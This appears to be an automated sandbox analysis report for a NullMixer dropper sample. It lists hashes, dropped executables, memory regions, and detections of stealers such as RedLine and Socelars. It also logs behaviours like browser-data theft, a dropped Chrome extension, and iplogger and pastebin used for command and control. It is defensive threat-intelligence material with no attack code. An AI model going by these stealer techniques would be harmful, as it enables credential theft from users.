SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-8PO24.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\7zS02AB0786\Sat14a7594cc5a0116.exe

MD5 492fe12bd7a2ea0ba1d2a5672f5a013a
SHA1 934a18ff3f83a43ce8c4a3cacba0d30d82c4276c
SHA256 45e13af971ea12864fd315f67096d0547bee1e07994f16bfedba10ca5beaad0f
SHA512 de5c99a7e20949bcd75bde8d971b343a6bae5255b5d46dd9472fde13ab0c3b4ce317eaf44527f79a113e2bd0b0efb0d19a5a53834e9b28a41b4885a888bcfd67

memory/2704-182-0x0000000000B10000-0x0000000000CB8000-memory.dmp

memory/2812-217-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2812-216-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2812-215-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2812-213-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2812-210-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2812-209-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2744-208-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-206-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-205-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-204-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-202-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-200-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-198-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-196-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2704-218-0x0000000002AE0000-0x0000000002B85000-memory.dmp

memory/2704-222-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/2704-219-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/1844-227-0x0000000000400000-0x0000000000883000-memory.dmp

memory/2208-226-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2704-230-0x0000000000B10000-0x0000000000CB8000-memory.dmp

memory/1000-229-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1276-228-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2208-232-0x0000000000400000-0x000000000089C000-memory.dmp

memory/2704-240-0x0000000002B90000-0x0000000002C22000-memory.dmp

memory/2704-241-0x0000000002C30000-0x00000000049DF000-memory.dmp

memory/2704-242-0x00000000049E0000-0x0000000004A6C000-memory.dmp

memory/2704-244-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-246-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-243-0x0000000004A70000-0x0000000004AF9000-memory.dmp

memory/2704-247-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/2704-248-0x00000000001F0000-0x00000000001F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabF344.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-23 18:41

Reported

2024-11-23 18:43

Platform

win10v2004-20241007-en

Max time kernel

77s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14514904a4b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4080 set thread context of 4552 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe

Browser Information Discovery

discovery

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat144474a564d26f29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-Q0LEB.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142b09ae40c44cf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-77CHV.tmp\Sat1481f5a7e3eccdd.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1481f5a7e3eccdd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1427fbafcf251.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\e31548b85abb75e70ead38c8788ca2f92d2ad1139a12f854280d1b4c866133ef.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat142ac5249376e895.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\JYCWewAX2vPOJ.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat1487ca754e680f91.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14a7594cc5a0116.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133768609177181217" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14febbc433.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14f1396dfcf191bd.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14d32a38896785b13.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zSCEC56487\Sat14b47e86b9c16b.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
